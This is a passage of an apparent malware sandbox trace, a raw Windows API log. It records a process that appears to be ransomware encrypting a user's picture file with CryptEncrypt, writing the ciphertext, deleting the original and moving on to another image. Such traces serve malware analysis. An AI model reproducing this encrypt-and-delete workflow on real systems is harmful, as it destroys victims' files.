hHeap=0x1780000) returned 1 [0093.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0093.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0093.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0093.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0093.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0093.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0093.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0093.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0093.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0093.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0093.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0093.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0093.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0093.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0093.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0093.023] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0093.023] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.023] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0093.023] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.023] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0093.024] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x9ea4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x9eb0) returned 1 [0093.024] CharLowerBuffW (in: lpsz="byte[40625]", cchLength=0xb | out: lpsz="byte[40625]") returned 0xb [0093.024] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.024] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0093.024] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4533c20*, pdwDataLen=0x144e538*=0x9ea4, dwBufLen=0x9eb0 | out: pbData=0x4533c20*, pdwDataLen=0x144e538*=0x9eb0) returned 1 [0093.024] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0093.025] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0093.025] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.025] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x9eb0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ef3c*=0x9eb0, lpOverlapped=0x0) returned 1 [0093.027] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0093.027] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.027] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca7a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0093.028] CryptDestroyKey (hKey=0x41ac740) returned 1 [0093.028] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0093.028] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0093.028] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.028] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0093.028] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0093.083] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.083] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.083] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0093.083] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0093.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796d68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0093.083] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0093.083] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.083] FreeLibrary (hLibModule=0x756e0000) returned 1 [0093.083] CloseHandle (hObject=0x258) returned 1 [0093.084] CloseHandle (hObject=0x298) returned 1 [0093.090] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\9Y-cpSQgv6l3vMS-rl5.png", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\9Y-cpSQgv6l3vMS-rl5.png", lpFilePart=0x0) returned 0x37 [0093.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dc08 [0093.090] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\9Y-cpSQgv6l3vMS-rl5.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\9y-cpsqgv6l3vms-rl5.png")) returned 0x20 [0093.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0093.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0093.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0093.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0093.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0093.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0093.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0093.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0093.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0093.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0093.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d938 [0093.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0093.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0093.091] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\9Y-cpSQgv6l3vMS-rl5.png", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x382517a0, ftCreationTime.dwHighDateTime=0x1d5eb00, ftLastAccessTime.dwLowDateTime=0x417af580, ftLastAccessTime.dwHighDateTime=0x1d5ef7f, ftLastWriteTime.dwLowDateTime=0x417af580, ftLastWriteTime.dwHighDateTime=0x1d5ef7f, nFileSizeHigh=0x0, nFileSizeLow=0x9ea4, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="9Y-cpSQgv6l3vMS-rl5.png", cAlternateFileName="9Y-CPS~1.PNG")) returned 0x41ac700 [0093.091] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\9Y-cpSQgv6l3vMS-rl5.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\9y-cpsqgv6l3vms-rl5.png")) returned 1 [0093.161] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x382517a0, ftCreationTime.dwHighDateTime=0x1d5eb00, ftLastAccessTime.dwLowDateTime=0x417af580, ftLastAccessTime.dwHighDateTime=0x1d5ef7f, ftLastWriteTime.dwLowDateTime=0x417af580, ftLastWriteTime.dwHighDateTime=0x1d5ef7f, nFileSizeHigh=0x0, nFileSizeLow=0x9ea4, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="9Y-cpSQgv6l3vMS-rl5.png", cAlternateFileName="9Y-CPS~1.PNG")) returned 0 [0093.161] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0093.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0093.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0093.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0093.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0093.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0093.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0093.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0093.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0093.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0093.161] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0093.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0093.162] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0093.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0093.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0093.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0093.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0093.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0093.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0093.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0093.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0093.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0093.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5a98 | out: hHeap=0x1780000) returned 1 [0093.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0093.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0093.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0093.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0093.162] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0093.162] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0093.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0093.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0093.162] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0093.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0093.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0093.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0093.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2330 [0093.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0093.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0093.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0093.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0093.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0093.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0093.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0093.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0093.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0093.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0093.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0093.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0093.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0093.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d20a8 [0093.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0093.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0093.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0093.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0093.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0093.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f68 [0093.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0093.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0093.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0093.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0093.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0093.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0093.163] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0093.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0093.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0093.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0093.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0093.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0093.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0093.164] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0093.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0093.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0093.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0093.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0093.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0093.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0093.164] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\AsLbgf0HCR8rP.jpg", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83d02bf0, ftCreationTime.dwHighDateTime=0x1d5e17c, ftLastAccessTime.dwLowDateTime=0xfc322800, ftLastAccessTime.dwHighDateTime=0x1d5ebae, ftLastWriteTime.dwLowDateTime=0xfc322800, ftLastWriteTime.dwHighDateTime=0x1d5ebae, nFileSizeHigh=0x0, nFileSizeLow=0x10cae, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="AsLbgf0HCR8rP.jpg", cAlternateFileName="ASLBGF~1.JPG")) returned 0x41ac440 [0093.164] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0093.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0093.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0093.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0093.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0093.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0093.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0093.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0093.164] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0093.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0093.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0093.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0093.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2400 [0093.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0093.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0093.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0093.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0093.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0093.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ff8 [0093.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0093.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0093.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0093.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0093.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0093.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0093.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0093.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0093.165] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0093.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0093.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0093.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0093.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0093.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0093.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0093.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0093.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0093.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0093.165] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0093.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0093.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0093.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0093.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24f0 [0093.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0093.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0093.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0093.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0093.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0093.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24c0 [0093.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0093.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0093.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0093.166] 